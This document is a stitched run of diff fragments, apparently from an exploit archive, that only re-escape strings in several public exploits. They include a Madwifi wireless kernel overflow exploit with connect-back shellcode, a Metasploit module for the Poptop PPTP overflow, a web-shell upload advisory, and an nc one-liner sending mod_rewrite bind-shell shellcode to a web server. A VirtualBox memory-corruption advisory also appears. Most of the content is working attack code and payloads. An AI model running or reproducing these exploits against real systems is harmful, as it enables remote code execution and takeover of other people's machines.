"\xcf"; //iret
|
||||
|
||||
|
||||
/* connect back */
|
||||
#define IP_OFFSET 35
|
||||
#define PORT_OFFSET 44
|
||||
char u_code[] =
|
||||
\"\\x31\\xc0\\x89\\xc3\\x40\\x40\\xcd\\x80\\x39\\xc3\\x74\\x03\\x31\\xc0\\x40\\xcd\\x80\" /* fork */
|
||||
\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x5b\\x5d\"
|
||||
\"\\xbe\"
|
||||
\"\\xf5\\xff\\xff\\xfe\" // ~ip
|
||||
\"\\xf7\\xd6\\x56\\x66\\xbd\"
|
||||
\"\\x69\\x7a\" // port
|
||||
\"\\x0f\\xcd\\x09\\xdd\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\"
|
||||
\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\"
|
||||
\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\";
|
||||
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
|
||||
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
|
||||
"\xbe"
|
||||
"\xf5\xff\xff\xfe" // ~ip
|
||||
"\xf7\xd6\x56\x66\xbd"
|
||||
"\x69\x7a" // port
|
||||
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
|
||||
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
|
||||
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
|
||||
|
||||
|
||||
/* 802.11header + WPA IE prolog */
|
||||
#define WPA_LEN_OFFSET 55
|
||||
#define CHANNEL 11
|
||||
char beacon_80211_wpa[] =
|
||||
\"\\x80\" // management frame / subtype beacon
|
||||
\"\\x00\" // flags
|
||||
\"\\x00\\x00\" // duration
|
||||
\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\" // destination addr
|
||||
\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // src address
|
||||
\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // bbsid
|
||||
\"\\x00\\x00\" // seq
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // timestamp
|
||||
\"\\x64\\x00\" // interval
|
||||
\"\\x01\\x00\" // caps
|
||||
\"\\x00\\x03\\x41\\x41\\x41\" // ssid Information Element
|
||||
\"\\x01\\x08\\x82\\x84\\x8b\\x96\\x0c\\x18\\x30\\x48\" // rates Information Element
|
||||
\"\\x03\\x01\\x0B\" // channel Information Element (11)
|
||||
\"\\xdd\\xc6\" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
|
||||
\"\\x00\\x50\\xf2\\x01\\x01\\x00\"; // oui + type + version (first 6 byte of len)
|
||||
"\x80" // management frame / subtype beacon
|
||||
"\x00" // flags
|
||||
"\x00\x00" // duration
|
||||
"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
|
||||
"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
|
||||
"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
|
||||
"\x00\x00" // seq
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
|
||||
"\x64\x00" // interval
|
||||
"\x01\x00" // caps
|
||||
"\x00\x03\x41\x41\x41" // ssid Information Element
|
||||
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
|
||||
"\x03\x01\x0B" // channel Information Element (11)
|
||||
"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
|
||||
"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)
|
||||
|
||||
#define JUMP_OFFSET_PATCH 1
|
||||
char jmp_back[]=\"\\xeb\\x00\";
|
||||
char jmp_back[]="\xeb\x00";
|
||||
|
||||
/* ----------------------------------- */
|
||||
|
||||
|
||||
void usage(char *prog)
|
||||
{
|
||||
printf(\"[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\\n\", prog);
|
||||
printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
|
||||
}
|
||||
|
||||
unsigned char *build_frame()
|
||||
|
@ -203,10 +203,10 @@ unsigned char *build_frame()
|
|||
|
||||
unsigned int hsb = sizeof(ring0_code)-1;
|
||||
unsigned int lsb = SHELLCODE_SPACE - hsb;
|
||||
printf(\"[*][low-kcode]: %d\\n[*][high-ucode]: %d\\n\",
|
||||
printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
|
||||
lsb, hsb);
|
||||
|
||||
printf(\"[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\\n\",
|
||||
printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
|
||||
sizeof(u_code)-1, sizeof(ring0_code)-1);
|
||||
|
||||
/* fix jump */
|
||||
|
@ -217,11 +217,11 @@ unsigned char *build_frame()
|
|||
unsigned int sub = 5 + (sizeof(u_code)-1);
|
||||
FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
|
||||
|
||||
printf(\"[*][payload space]: %d\\n\", PAYLOAD_SPACE);
|
||||
printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
|
||||
|
||||
/* fix beacon_80211_wpa: WPA len */
|
||||
FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
|
||||
printf(\"[*][beacon_WPA_IE_lenght]: %u\\n\",
|
||||
printf("[*][beacon_WPA_IE_lenght]: %u\n",
|
||||
(unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
|
||||
|
||||
/* fill frame */
|
||||
|
@ -256,43 +256,43 @@ unsigned char *build_frame()
|
|||
void print_frame(unsigned char *frame, unsigned int size)
|
||||
{
|
||||
int i;
|
||||
printf(\"\\n[printing frame - start]\\n \");
|
||||
printf("\n[printing frame - start]\n ");
|
||||
for(i=1; i<=size; i++)
|
||||
{
|
||||
printf(\"%02x \", frame[i-1]);
|
||||
printf("%02x ", frame[i-1]);
|
||||
if((i % 16) == 0)
|
||||
printf(\"\\n \");
|
||||
printf("\n ");
|
||||
}
|
||||
printf(\"\\n[printing frame - end]\\n\");
|
||||
printf("\n[printing frame - end]\n");
|
||||
}
|
||||
|
||||
void parse_arg(int argc, char **argv)
|
||||
{
|
||||
int opt;
|
||||
struct in_addr in;
|
||||
while( (opt=getopt(argc, argv, \"j:i:a:p:d:g:\")) != EOF)
|
||||
while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
|
||||
{
|
||||
switch(opt)
|
||||
{
|
||||
case \'j\':
|
||||
case 'j':
|
||||
jmp_address = strtoll(optarg, NULL, 16);
|
||||
break;
|
||||
case \'a\':
|
||||
case 'a':
|
||||
ip = strdup(optarg);
|
||||
inet_aton(ip, &in);
|
||||
FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));
|
||||
break;
|
||||
case \'p\':
|
||||
case 'p':
|
||||
port = atoi(optarg);
|
||||
FIX_WORD(u_code, PORT_OFFSET, port);
|
||||
break;
|
||||
case \'d\':
|
||||
case 'd':
|
||||
driver = strdup(optarg);
|
||||
break;
|
||||
case \'i\':
|
||||
case 'i':
|
||||
iface = strdup(optarg);
|
||||
break;
|
||||
case \'g\':
|
||||
case 'g':
|
||||
pad_space = atoi(optarg);
|
||||
break;
|
||||
default:
|
||||
|
@ -318,10 +318,10 @@ int main(int argc, char *argv[])
|
|||
exit(1);
|
||||
}
|
||||
|
||||
printf( \"\\n\\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\\n\\t exploit code: sgrakkyu <at> antifork.org\\n\"
|
||||
\"-------------------- **** ------------------\\n\"
|
||||
\"[opt-ip]: %s\\n[opt-port]: %d\\n[opt-iface]: %s\\n[opt-driver]: %s\\n[opt-jump]: 0x%08x\\n[pad]: %d\\n\"
|
||||
\"-------------------- **** ------------------\\n\\n\",
|
||||
printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
|
||||
"-------------------- **** ------------------\n"
|
||||
"[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
|
||||
"-------------------- **** ------------------\n\n",
|
||||
ip, port, iface, driver, jmp_address, pad_space);
|
||||
|
||||
unsigned char *frame = build_frame();
|
||||
|
@ -333,30 +333,30 @@ int main(int argc, char *argv[])
|
|||
/* Validate the driver name specified */
|
||||
if (drivertype == INJ_NODRIVER)
|
||||
{
|
||||
fprintf(stderr, \"Driver name not recognized.\\n\");
|
||||
fprintf(stderr, "Driver name not recognized.\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
|
||||
fprintf(stderr, \"Error initializing drive \\\"%s\\\".\\n\", argv[1]);
|
||||
fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
|
||||
{
|
||||
fprintf(stderr, \"Driver does not support transmitting control frames.\\n\");
|
||||
fprintf(stderr, "Driver does not support transmitting control frames.\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Error setting channel.\\n\");
|
||||
fprintf(stderr, "Error setting channel.\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (tx80211_open(&in_tx) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Unable to open interface %s.\\n\", in_tx.ifname);
|
||||
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
|
||||
return 1;
|
||||
}
|
||||
|
||||
|
@ -364,15 +364,15 @@ int main(int argc, char *argv[])
|
|||
in_packet.packet = frame;
|
||||
in_packet.plen = TOTAL_PACKET_LEN;
|
||||
|
||||
printf(\"[sending packets]: about 10 a second\\n\");
|
||||
printf("[sending packets]: about 10 a second\n");
|
||||
|
||||
while(i < 10000)
|
||||
{
|
||||
/* Transmit the packet */
|
||||
if (tx80211_txpacket(&in_tx, &in_packet) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Unable to transmit packet.\\n\");
|
||||
perror(\"txpacket\");
|
||||
fprintf(stderr, "Unable to transmit packet.\n");
|
||||
perror("txpacket");
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
##
|
||||
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Poptop Negative Read Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Poptop Negative Read Overflow',
|
||||
'Description' => %q{
|
||||
This is an exploit for the Poptop negative read overflow. This will
|
||||
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
|
||||
currently do not have a good way to detect Poptop versions.
|
||||
|
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Using the current method of exploitation, our socket will be closed
|
||||
before we have the ability to run code, preventing the use of Findsock.
|
||||
},
|
||||
\'Author\' => \'spoonm\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'Author' => 'spoonm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2003-0213\'],
|
||||
[\'OSVDB\', \'3293\'],
|
||||
[\'URL\', \'http://securityfocus.com/archive/1/317995\'],
|
||||
[\'URL\', \'http://www.freewebs.com/blightninjas/\'],
|
||||
['CVE', '2003-0213'],
|
||||
['OSVDB', '3293'],
|
||||
['URL', 'http://securityfocus.com/archive/1/317995'],
|
||||
['URL', 'http://www.freewebs.com/blightninjas/'],
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
# Payload space is dynamically determined
|
||||
\'MinNops\' => 16,
|
||||
\'StackAdjustment\' => -1088
|
||||
'MinNops' => 16,
|
||||
'StackAdjustment' => -1088
|
||||
},
|
||||
\'SaveRegisters\' => [ \'esp\' ],
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Targets\' =>
|
||||
'SaveRegisters' => [ 'esp' ],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[\'Linux Bruteforce\',
|
||||
{ \'Bruteforce\' =>
|
||||
['Linux Bruteforce',
|
||||
{ 'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffa00 },
|
||||
\'Stop\' => { \'Ret\' => 0xbffff000 },
|
||||
\'Step\' => 0
|
||||
'Start' => { 'Ret' => 0xbffffa00 },
|
||||
'Stop' => { 'Ret' => 0xbffff000 },
|
||||
'Step' => 0
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 9 2003\'))
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 9 2003'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -74,26 +74,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]),
|
||||
OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]),
|
||||
OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
|
||||
OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]),
|
||||
OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
|
||||
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
|
||||
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
|
||||
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
|
||||
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
|
||||
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Dynamic payload space calculation
|
||||
def payload_space
|
||||
datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
|
||||
datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
|
||||
end
|
||||
|
||||
def build_packet(length)
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
|
||||
[1,0].pack(\'cc\') +
|
||||
[0].pack(\'n\') +
|
||||
[1,1,0,2600].pack(\'NNnn\') +
|
||||
datastore[\'Hostname\'].ljust(64, \"\\x00\") +
|
||||
datastore[\'Vendor\'].ljust(64, \"\\x00\")
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
|
||||
[1,0].pack('cc') +
|
||||
[0].pack('n') +
|
||||
[1,1,0,2600].pack('NNnn') +
|
||||
datastore['Hostname'].ljust(64, "\x00") +
|
||||
datastore['Vendor'].ljust(64, "\x00")
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def brute_exploit(addrs)
|
||||
connect
|
||||
|
||||
print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
|
||||
print_status("Trying #{"%.8x" % addrs['Ret']}...")
|
||||
|
||||
# Construct the evil length packet
|
||||
packet =
|
||||
build_packet(1) +
|
||||
payload.encoded +
|
||||
([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
|
||||
([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
|
|
|
@ -16,17 +16,17 @@
|
|||
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
||||
|
|
||||
|
|
||||
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click \"modfier\"
|
||||
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
||||
|
|
||||
|
|
||||
| 3-Now upload your shell in \"php.jpg\" format
|
||||
| 3-Now upload your shell in "php.jpg" format
|
||||
|
|
||||
|
|
||||
| 4-Finally do a right click in the icon situated in \"Apparence\" then copy the link of your shell.
|
||||
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
||||
|
|
||||
[-]#############################################################
|
||||
|
|
||||
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim\'s
|
||||
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
||||
|
|
||||
[-]#############################################################
|
||||
|
||||
|
|
|
@ -3,12 +3,12 @@
|
|||
# Vulnerability discovered by Mark Dowd.
|
||||
# CVE-2006-3747
|
||||
#
|
||||
# by jack <jack\\x40gulcas\\x2Eorg>
|
||||
# by jack <jack\x40gulcas\x2Eorg>
|
||||
# 2006-08-20
|
||||
#
|
||||
# Thx to xuso for help me with the shellcode.
|
||||
#
|
||||
# I suppose that you\'ve the \"RewriteRule kung/(.*) $1\" rule if not
|
||||
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
|
||||
# you must recalculate adressess.
|
||||
#
|
||||
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
|
||||
|
@ -19,26 +19,26 @@
|
|||
#
|
||||
# Gulcas rulez :P
|
||||
|
||||
echo -e \"mod_rewrite apache off-by-one overflow\"
|
||||
echo \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"
|
||||
echo -e "mod_rewrite apache off-by-one overflow"
|
||||
echo "by jack <jack\x40gulcas\x2eorg>\n\n"
|
||||
|
||||
if [ $# -ne 1 ] ; then
|
||||
echo \"Usage: $0 webserver\"
|
||||
echo "Usage: $0 webserver"
|
||||
exit
|
||||
fi
|
||||
|
||||
host=$1
|
||||
|
||||
echo -ne \"GET /kung/ldap://localhost/`perl -e \'print \"%90\"x128\'`%89%e6\\
|
||||
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\
|
||||
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\
|
||||
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\
|
||||
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\
|
||||
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\
|
||||
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\
|
||||
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\
|
||||
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\
|
||||
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\
|
||||
Host: $host\\r\\n\\r\\n\" | nc $host 80
|
||||
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
|
||||
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
|
||||
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
|
||||
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
|
||||
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
|
||||
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
|
||||
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
|
||||
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
|
||||
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
|
||||
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
|
||||
Host: $host\r\n\r\n" | nc $host 80
|
||||
|
||||
# milw0rm.com [2006-08-21]
|
||||
|
|
|
@ -38,7 +38,7 @@ targeted at server, desktop and embedded use.
|
|||
VirtualBox provides -among many other features- 3D Acceleration for
|
||||
guest machines
|
||||
through its Guest Additions. This feature allows guest machines to use
|
||||
the host machine\'s
|
||||
the host machine's
|
||||
GPU to render 3D graphics based on then OpenGL or Direct3D APIs.
|
||||
|
||||
Multiple memory corruption vulnerabilities have been found in the code
|
||||
|
@ -95,13 +95,13 @@ corruption vulnerabilities, as described below.
|
|||
|
||||
[CVE-2014-0981] The first vulnerability is caused by a *design flaw* in
|
||||
Chromium. The Chromium server makes use
|
||||
of \"*network pointers*\". As defined in Chromium\'s documentation,
|
||||
\'\"Network pointers are
|
||||
of "*network pointers*". As defined in Chromium's documentation,
|
||||
'"Network pointers are
|
||||
simply memory addresses that reside on another machine.[...] The
|
||||
networking layer will then
|
||||
take care of writing the payload data to the specified address.\"\'[2]
|
||||
take care of writing the payload data to the specified address."'[2]
|
||||
|
||||
So the Chromium\'s server code, which runs in the context of the
|
||||
So the Chromium's server code, which runs in the context of the
|
||||
VirtualBox hypervisor
|
||||
in the Host OS, provides a write-what-where memory corruption primitive
|
||||
*by design*, which
|
||||
|
@ -110,9 +110,9 @@ data in the hypervisor process
|
|||
from within a virtual machine.
|
||||
|
||||
This is the code of the vulnerable function [file
|
||||
\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
|
||||
be reached by sending a \'CR_MESSAGE_READBACK\' message to the
|
||||
\'VBoxSharedCrOpenGL\' service:
|
||||
'src/VBox/GuestHost/OpenGL/util/net.c'], which can
|
||||
be reached by sending a 'CR_MESSAGE_READBACK' message to the
|
||||
'VBoxSharedCrOpenGL' service:
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -139,12 +139,12 @@ crNetRecvReadback( CRMessageReadback *rb, unsigned int len )
|
|||
|
||||
-----/
|
||||
|
||||
Note that \'rb\' points to a \'CRMessageReadback\' structure, which is fully
|
||||
Note that 'rb' points to a 'CRMessageReadback' structure, which is fully
|
||||
controlled by the
|
||||
application running inside a VM that is sending OpenGL rendering
|
||||
commands to the Host side.
|
||||
The \'len\' parameter is also fully controlled from the Guest side, so
|
||||
it\'s possible to:
|
||||
The 'len' parameter is also fully controlled from the Guest side, so
|
||||
it's possible to:
|
||||
|
||||
1. decrement the value stored at any memory address within the
|
||||
address space of the hypervisor.
|
||||
|
@ -154,13 +154,13 @@ the hypervisor.
|
|||
7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability*
|
||||
|
||||
[CVE-2014-0982] The second vulnerability is closely related to the first
|
||||
one, and it\'s also caused by Chromium\'s
|
||||
\"*network pointers*\".
|
||||
one, and it's also caused by Chromium's
|
||||
"*network pointers*".
|
||||
|
||||
This is the code of the vulnerable function [file
|
||||
\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
|
||||
be reached by sending a \'CR_MESSAGE_WRITEBACK\' message to the
|
||||
\'VBoxSharedCrOpenGL\' service:
|
||||
'src/VBox/GuestHost/OpenGL/util/net.c'], which can
|
||||
be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the
|
||||
'VBoxSharedCrOpenGL' service:
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -178,10 +178,10 @@ crNetRecvWriteback( CRMessageWriteback *wb )
|
|||
|
||||
-----/
|
||||
|
||||
Note that \'rb\' points to a \'CRMessageWriteback\' structure, which is
|
||||
Note that 'rb' points to a 'CRMessageWriteback' structure, which is
|
||||
fully controlled by the
|
||||
application running inside a VM that is sending OpenGL rendering
|
||||
commands to the Host side, so it\'s possible to
|
||||
commands to the Host side, so it's possible to
|
||||
decrement the value stored at any memory address within the address
|
||||
space of the hypervisor.
|
||||
|
||||
|
@ -192,11 +192,11 @@ Vulnerability*
|
|||
[CVE-2014-0983] When an OpenGL application running inside a VM sends
|
||||
rendering commands (in the form of opcodes + data for those opcodes)
|
||||
through
|
||||
a \'CR_MESSAGE_OPCODES\' message, the Chromium server will handle them in
|
||||
the \'crUnpack\' function.
|
||||
The code for the \'crUnpack\' function is automatically generated by the
|
||||
a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in
|
||||
the 'crUnpack' function.
|
||||
The code for the 'crUnpack' function is automatically generated by the
|
||||
Python script located
|
||||
at \'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py\'.
|
||||
at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'.
|
||||
|
||||
This function is basically a big switch statement dispatching different
|
||||
functions according to the opcode being processed:
|
||||
|
@ -212,7 +212,7 @@ void crUnpack( const void *data, const void *opcodes,
|
|||
|
||||
for (i = 0 ; i < num_opcodes ; i++)
|
||||
{
|
||||
/*crDebug(\"Unpacking opcode \\%d\", *unpack_opcodes);*/
|
||||
/*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/
|
||||
switch( *unpack_opcodes )
|
||||
{
|
||||
case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break;
|
||||
|
@ -222,9 +222,9 @@ void crUnpack( const void *data, const void *opcodes,
|
|||
|
||||
-----/
|
||||
|
||||
When the opcode being processed is \'CR_VERTEXATTRIB4NUBARB_OPCODE\'
|
||||
(\'0xEA\'),
|
||||
the function to be invoked is \'crUnpackVertexAttrib4NubARB\':
|
||||
When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE'
|
||||
('0xEA'),
|
||||
the function to be invoked is 'crUnpackVertexAttrib4NubARB':
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -235,9 +235,9 @@ break;
|
|||
|
||||
-----/
|
||||
|
||||
The \'crUnpackVertexAttrib4NubARB\' function reads 5 values from the
|
||||
The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the
|
||||
opcode data sent by the Chromium client,
|
||||
and just invokes \'cr_unpackDispatch.VertexAttrib4NubARB\' with those 5
|
||||
and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5
|
||||
values as arguments:
|
||||
|
||||
|
||||
|
@ -255,11 +255,11 @@ static void crUnpackVertexAttrib4NubARB(void)
|
|||
|
||||
-----/
|
||||
|
||||
\'VertexAttrib4NubARB\' is a function pointer in a dispatch table, and
|
||||
'VertexAttrib4NubARB' is a function pointer in a dispatch table, and
|
||||
points to the function
|
||||
\'crServerDispatchVertexAttrib4NubARB\', whose code is generated by the
|
||||
'crServerDispatchVertexAttrib4NubARB', whose code is generated by the
|
||||
Python script located at
|
||||
\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\':
|
||||
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py':
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -273,11 +273,11 @@ z, w );
|
|||
|
||||
-----/
|
||||
|
||||
Note that the \'index\' parameter, which is a 4-byte integer coming from
|
||||
Note that the 'index' parameter, which is a 4-byte integer coming from
|
||||
an untrusted source (the opcode data
|
||||
sent by the Chromium client from the VM), is used as an index within the
|
||||
\'cr_server.current.c.vertexAttrib.ub4\'
|
||||
array in order to write \'cr_unpackData\' (which is a pointer to the
|
||||
'cr_server.current.c.vertexAttrib.ub4'
|
||||
array in order to write 'cr_unpackData' (which is a pointer to the
|
||||
attacker-controlled opcode data), without
|
||||
validating that the index is within the bounds of the array.
|
||||
This issue can be leveraged to corrupt arbitrary memory with a pointer
|
||||
|
@ -285,7 +285,7 @@ to attacker-controlled data.
|
|||
|
||||
Also note that *the same vulnerability affects several functions* whose
|
||||
code is generated by the
|
||||
